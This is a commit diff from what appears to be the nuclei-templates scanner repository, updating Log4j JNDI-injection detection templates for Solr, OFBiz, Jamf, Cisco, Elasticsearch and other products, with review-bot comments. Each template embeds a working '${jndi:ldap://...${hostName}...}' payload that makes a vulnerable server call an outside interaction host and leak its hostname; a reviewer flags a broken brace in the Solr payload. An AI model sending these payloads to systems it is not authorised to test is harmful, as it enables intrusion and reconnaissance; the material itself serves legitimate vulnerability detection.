Merge pull request #7170 from projectdiscovery/update-log4j

Update All Existing Log4j Templates
patch-1
Ritik Chaddha 2023-05-11 13:13:19 +05:30 committed by GitHub
commit 9082cb7329
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
25 changed files with 399 additions and 127 deletions


@ -1,51 +1,55 @@
file/keys/postman-api-key.yaml cves/2017/CVE-2017-16894.yaml
headless/technologies/sap-spartacus.yaml cves/2020/CVE-2020-10199.yaml
http/cves/2017/CVE-2017-17731.yaml cves/2021/CVE-2021-25078.yaml
http/cves/2020/CVE-2020-27481.yaml cves/2021/CVE-2021-35250.yaml
http/cves/2021/CVE-2021-27314.yaml cves/2022/CVE-2022-0747.yaml
http/cves/2021/CVE-2021-27315.yaml cves/2022/CVE-2022-0769.yaml
http/cves/2021/CVE-2021-27316.yaml cves/2022/CVE-2022-0773.yaml
http/cves/2021/CVE-2021-27319.yaml cves/2022/CVE-2022-0846.yaml
http/cves/2021/CVE-2021-27320.yaml cves/2022/CVE-2022-0864.yaml
http/cves/2021/CVE-2021-30175.yaml cves/2022/CVE-2022-1903.yaml
http/cves/2021/CVE-2021-44228.yaml cves/2022/CVE-2022-2219.yaml
http/cves/2022/CVE-2022-24264.yaml cves/2022/CVE-2022-24223.yaml
http/cves/2022/CVE-2022-24265.yaml cves/2022/CVE-2022-25485.yaml
http/cves/2022/CVE-2022-24266.yaml cves/2022/CVE-2022-25486.yaml
http/cves/2022/CVE-2022-24716.yaml cves/2022/CVE-2022-25487.yaml
http/cves/2022/CVE-2022-27984.yaml cves/2022/CVE-2022-25488.yaml
http/cves/2022/CVE-2022-27985.yaml cves/2022/CVE-2022-25489.yaml
http/cves/2022/CVE-2022-3980.yaml cves/2022/CVE-2022-25497.yaml
http/cves/2022/CVE-2022-42095.yaml cves/2022/CVE-2022-27926.yaml
http/cves/2022/CVE-2022-42096.yaml cves/2022/CVE-2022-28032.yaml
http/cves/2022/CVE-2022-4328.yaml cves/2022/CVE-2022-3062.yaml
http/cves/2022/CVE-2022-45037.yaml cves/2022/CVE-2022-37190.yaml
http/cves/2022/CVE-2022-45038.yaml cves/2022/CVE-2022-37191.yaml
http/cves/2022/CVE-2022-46020.yaml cves/2022/CVE-2022-38295.yaml
http/cves/2023/CVE-2023-1020.yaml cves/2022/CVE-2022-38296.yaml
http/cves/2023/CVE-2023-1671.yaml cves/2022/CVE-2022-38467.yaml
http/cves/2023/CVE-2023-20864.yaml cves/2022/CVE-2022-41441.yaml
http/cves/2023/CVE-2023-25135.yaml cves/2022/CVE-2022-42094.yaml
http/cves/2023/CVE-2023-26360.yaml cves/2022/CVE-2022-4321.yaml
http/cves/2023/CVE-2023-27350.yaml cves/2023/CVE-2023-0099.yaml
http/cves/2023/CVE-2023-27524.yaml cves/2023/CVE-2023-22620.yaml
http/cves/2023/CVE-2023-29489.yaml cves/2023/CVE-2023-22897.yaml
http/cves/2023/CVE-2023-29922.yaml cves/2023/CVE-2023-27008.yaml
http/cves/2023/CVE-2023-30210.yaml cves/2023/CVE-2023-27159.yaml
http/cves/2023/CVE-2023-30212.yaml cves/2023/CVE-2023-27179.yaml
http/cves/2023/CVE-2023-31059.yaml cves/2023/CVE-2023-29084.yaml
http/cves/2023/CVE-2023-32235.yaml default-logins/trassir/trassir-default-login.yaml
http/default-logins/powerjob-default-login.yaml exposed-panels/appwrite-panel.yaml
http/default-logins/umami/umami-default-login.yaml exposed-panels/aspect-control-panel.yaml
http/exposed-panels/oracle-opera-login.yaml exposures/logs/yii-error-page.yaml
http/exposed-panels/papercut-ng-panel.yaml misconfiguration/apollo-adminservice-unauth.yaml
http/exposed-panels/proxmox-panel.yaml misconfiguration/default-spx-key.yaml
http/exposed-panels/red-lion-panel.yaml misconfiguration/sql-server-report-viewer.yaml
http/exposed-panels/sophos-web-appliance.yaml misconfiguration/thinkphp-errors.yaml
http/exposures/tokens/postman/postman-key.yaml network/detection/msmq-detect.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml network/enumeration/beanstalk-service.yaml
http/osint/mail-archive.yaml osint/hashnode.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml osint/imgbb.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml osint/rubygems.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml technologies/default-apache-shiro.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml technologies/switch-protocol.yaml
vulnerabilities/generic/cache-poisoning-xss.yaml
vulnerabilities/huawei/huawei-firewall-lfi.yaml
vulnerabilities/others/universal-media-xss.yaml
vulnerabilities/wordpress/ldap-wp-login-xss.yaml


@ -55,19 +55,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 2 group: 2
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28 # Enhanced by mp on 2022/02/28
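Review bot: The comment on the matcher's regex (the entry just above `extractors:`) reads `# Print extracted ... in output`, but a matcher prints nothing; it only decides whether the callback counts as a hit. I would change it to `# Match the 6-digit marker, ${hostName} and injection-point labels in the callback name`. The same copied comment sits on the matcher regex in the other template sections of this commit, several of which previously said `# Match for extracted ${hostName} variable`. The template's request block is outside this hunk, so the payload that the regex mirrors is not visible here.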


@ -22,12 +22,16 @@ info:
shodan-query: http.html:"Apache OFBiz" shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET /webtools/control/main HTTP/1.1 GET /webtools/control/main HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -39,13 +43,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27
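Review bot: The new `variables:` block has no comment tying it to the `\d{6}` prefix in the matcher and extractor regexes further down. `rand_int(111, 999)` yields three digits for each of `rand1` and `rand2`, and the regexes only match while that stays true. A comment above `rand1` such as `# rand1 + rand2 form the 6-digit marker matched by \d{6} below; keep both three digits wide` would record the dependency. The same block is added without comment to every template in this commit.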


@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr" shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@timeout: 25s @timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1 GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
attack: clusterbomb attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 2
regex: regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
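Review bot: The rewritten request line has one closing brace too many after `rand2`: `%24%7B%3A-{{rand2}}}%7D` renders as `${:-NNN}}`, so the second `}` appears to close the outer lookup before `.${hostName}.uri.{{interactsh-url}}` is reached. If so, no callback carries the interactsh name and the template would report a vulnerable Solr instance as clean. The Elasticsearch template in this commit uses the balanced form; here the segment should read `%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D`. The request block continues outside the hunk.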


@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}} Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,21 +45,31 @@ http:
words: words:
- "dns" - "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word - type: word
part: body part: body
words: words:
- "<title>Jamf Pro Login</title>" - "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27
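Review bot: The `group: 2` extractor only yields the injection point when `{{interactsh-url}}` has exactly three labels, because the regex is unanchored and its first group is greedy and accepts dots. With an interaction server on a longer domain the groups would shift, and group 2 would report part of the server name instead of `username`; this is inferred from the pattern, not tested. A comment on the extractor such as `# assumes {{interactsh-url}} is <id>.<domain>.<tld>` would state the assumption. The same holds for the identical extractors in the other templates of this commit.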


@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite" shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@timeout: 10s @timeout: 10s
POST /suite-auth/login HTTP/1.1 POST /suite-auth/login HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -55,10 +59,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22 # Enhanced by md on 2023/03/22


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,17 +45,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04 # Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -54,10 +58,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023 # Enhanced by CS 03/27/2023


@ -24,10 +24,14 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost' - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -39,13 +43,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27


@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}} Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -48,13 +52,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23


@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -47,13 +51,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23


@ -21,10 +21,14 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1 GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
{ {
@ -44,17 +48,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04 # Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
